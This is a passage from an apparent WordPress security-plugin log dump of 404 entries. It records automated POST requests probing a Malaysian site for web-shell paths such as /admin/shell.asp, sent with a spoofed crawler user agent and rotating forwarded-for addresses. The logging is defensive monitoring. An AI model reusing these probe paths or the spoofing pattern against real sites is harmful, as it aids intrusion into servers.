Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"159.226.152.235\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"159.226.152.235\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2VbaAwEvHJaKWJ1hYikQAAAAI\";s:12:\"REDIRECT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"50417\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:10:\"SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2VbaAwEvHJaKWJ1hYikQAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657071.6836\";s:12:\"REQUEST_TIME\";s:10:\"1571657071\";}}','notice','2019-10-21 11:24:34','2019-10-21 11:24:32',35263312,37066016,'http://bintara.com.my//bin/qiedu.AsPx',1,0,'159.226.152.235'),(28595,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//bin/qiedu.AsPx\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.66.235.213\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.66.235.213\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2Vd21ncq3cUuJao9IeigAAAIQ\";s:12:\"REDIRECT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"50570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:10:\"SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2Vd21ncq3cUuJao9IeigAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657085.4997\";s:12:\"REQUEST_TIME\";s:10:\"1571657085\";}}','notice','2019-10-21 11:25:08','2019-10-21 11:24:49',35655928,37450136,'http://bintara.com.my//bin/qiedu.AsPx',1,0,'58.66.235.213'),(28596,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//bin/qiedu.AsPx\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.199.72.47\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.199.72.47\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2ViW1ncq3cUuJao9IeowAAAJI\";s:12:\"REDIRECT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"50908\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:10:\"SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2ViW1ncq3cUuJao9IeowAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657103.9693\";s:12:\"REQUEST_TIME\";s:10:\"1571657103\";}}','notice','2019-10-21 11:25:22','2019-10-21 11:25:06',35269104,37073232,'http://bintara.com.my//bin/qiedu.AsPx',1,0,'222.199.72.47'),(28597,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//bin/qiedu.AsPx\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.194.95.190\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.194.95.190\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2Vjm1ncq3cUuJao9IeqgAAAIs\";s:12:\"REDIRECT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"51116\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/bin/qiedu.AsPx\";s:10:\"SCRIPT_URL\";s:15:\"/bin/qiedu.AsPx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2Vjm1ncq3cUuJao9IeqgAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657106.6781\";s:12:\"REQUEST_TIME\";s:10:\"1571657106\";}}','notice','2019-10-21 11:25:27','2019-10-21 11:25:10',35661536,37468384,'http://bintara.com.my//bin/qiedu.AsPx',1,0,'58.194.95.190'),(28598,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//weifang/ao.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.145.84.13\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.145.84.13\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/weifang/ao.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/weifang/ao.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2VpW1ncq3cUuJao9IeyAAAAIk\";s:12:\"REDIRECT_URL\";s:15:\"/weifang/ao.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"51505\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/weifang/ao.asp\";s:10:\"SCRIPT_URL\";s:15:\"/weifang/ao.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2VpW1ncq3cUuJao9IeyAAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657126.3885\";s:12:\"REQUEST_TIME\";s:10:\"1571657126\";}}','notice','2019-10-21 11:25:30','2019-10-21 11:25:26',35341624,37144608,'http://bintara.com.my//weifang/ao.asp',1,0,'211.145.84.13'),(28599,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//weifang/ao.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.127.121.232\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.127.121.232\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/weifang/ao.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/weifang/ao.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2Vq6AwEvHJaKWJ1hYirgAAABQ\";s:12:\"REDIRECT_URL\";s:15:\"/weifang/ao.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"51698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/weifang/ao.asp\";s:10:\"SCRIPT_URL\";s:15:\"/weifang/ao.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2Vq6AwEvHJaKWJ1hYirgAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657134.3556\";s:12:\"REQUEST_TIME\";s:10:\"1571657134\";}}','notice','2019-10-21 11:25:57','2019-10-21 11:25:38',35265496,37061640,'http://bintara.com.my//weifang/ao.asp',1,0,'202.127.121.232'),(28600,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//com3.stb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"123.172.211.25\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"123.172.211.25\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2V1G1ncq3cUuJao9Ie8wAAAJM\";s:12:\"REDIRECT_URL\";s:13:\"/com3.stb.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"52481\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:10:\"SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2V1G1ncq3cUuJao9Ie8wAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657173.9607\";s:12:\"REQUEST_TIME\";s:10:\"1571657173\";}}','notice','2019-10-21 11:26:23','2019-10-21 11:26:16',35345952,37146056,'http://bintara.com.my//com3.stb.asp',1,0,'123.172.211.25'),(28601,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//com3.stb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"59.79.209.89\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"59.79.209.89\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2V3eB6WkHPNakGAMKdnQAAAEY\";s:12:\"REDIRECT_URL\";s:13:\"/com3.stb.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"52670\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:10:\"SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2V3eB6WkHPNakGAMKdnQAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657182.8654\";s:12:\"REQUEST_TIME\";s:10:\"1571657182\";}}','notice','2019-10-21 11:26:26','2019-10-21 11:26:25',35267720,37078288,'http://bintara.com.my//com3.stb.asp',1,0,'59.79.209.89'),(28602,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/shell.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.234.147.116\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.234.147.116\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/shell.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/shell.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2WLm1ncq3cUuJao9IfegAAAIE\";s:12:\"REDIRECT_URL\";s:16:\"/admin/shell.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"54602\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/shell.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/shell.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2WLm1ncq3cUuJao9IfegAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657268.7001\";s:12:\"REQUEST_TIME\";s:10:\"1571657268\";}}','notice','2019-10-21 11:28:08','2019-10-21 11:27:49',35743448,37548376,'http://bintara.com.my//admin/shell.asp',1,0,'61.234.147.116'),(28603,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/shell.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 